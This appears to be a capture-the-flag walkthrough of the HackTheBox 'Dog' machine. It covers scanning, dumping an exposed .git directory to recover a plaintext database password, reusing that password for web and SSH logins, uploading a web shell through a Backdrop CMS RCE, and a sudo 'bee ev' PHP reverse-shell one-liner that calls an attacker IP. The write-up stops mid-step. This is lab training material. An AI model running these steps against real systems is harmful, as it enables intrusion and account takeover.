Dog
- 🌐 Website: HackTheBox
- 🔥 Level: Easy
- 🖥️ OS: Linux
- 🔗 Link: Dog
Foothold¶
target=10.10.11.58
$ nmap -sC -sV $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 10:47 UTC
Nmap scan report for 10.10.11.58
Host is up (0.024s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
Notice that the website has a .git directory and uses Backdrop CMS.
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51597.txt
--------------------------------------------------------------------
User access¶
We can see an Authenticated RCE exploit. I try to dump the .git directory with git-dumper.
I find a settings.php file with these credentials: mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop
I see a user named dogBackDropSystem on the website. Maybe this is his password? No, it isn't. I look for other users:
grep -r dog.htb
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
Trying with tiffany. It works!
I use the script found in searchploit and it says to upload the generated shell at this link http://dog.htb/?q=admin/modules/install.
But the website wants a tar.gz. So I unpacked shell.zip and repacked it to tar.gz.
And it worked. I follow the script tip and go to http://dog.htb/modules/shell/shell.php.
Typing id:
I gained a full interactive reverse shell:
www-data@dog:/var/www$ cd /home
www-data@dog:/home$ ls
jobert johncusack
www-data@dog:/home$ ls jobert/
www-data@dog:/home$ ls johncusack/
test.php user.txt
www-data@dog:/home$ cat johncusack/user.txt
cat: johncusack/user.txt: Permission denied
www-data@dog:/home$
www-data@dog:/home$ ls -la johncusack/
total 36
drwxr-xr-x 4 johncusack johncusack 4096 Mar 14 10:16 .
drwxr-xr-x 4 root root 4096 Aug 15 2024 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack 220 Aug 15 2024 .bash_logout
-rw-r--r-- 1 johncusack johncusack 3771 Aug 15 2024 .bashrc
drwx------ 2 johncusack johncusack 4096 Aug 16 2024 .cache
drwxrwxr-x 3 johncusack johncusack 4096 Mar 14 10:15 .local
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack 807 Aug 15 2024 .profile
-rw-rw-r-- 1 johncusack johncusack 27 Mar 14 10:16 test.php
-rw-r----- 1 root johncusack 33 Mar 14 08:52 user.txt
Maybe one of these users has the same password?
johncusack:BackDropJ2024DS2024
Privesc¶
Running linpeas.sh:
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh
/usr/bin/ip-tools.sh
╔══════════╣ Unexpected in root
/backdrop_tool
Running sudo -l:
johncusack@dog:/tmp/lin$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
I run this script and see an interesting thing:
ADVANCED
db-query
dbq
Execute a query using db_query().
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
php-script
scr
Execute an arbitrary PHP file after bootstrapping Backdrop.
sql
sqlc, sql-cli, db-cli
Open an SQL command-line interface using Backdrop's database credentials.
I can try to execute code using ev.
johncusack@dog:/var/www/html$ sudo bee ev '$sock=fsockopen("10.10.14.49",9001);system("/bin/bash <&3 >&3 2>&3");'
It loads but the shell doesn't work. I try to cat the root flag directly: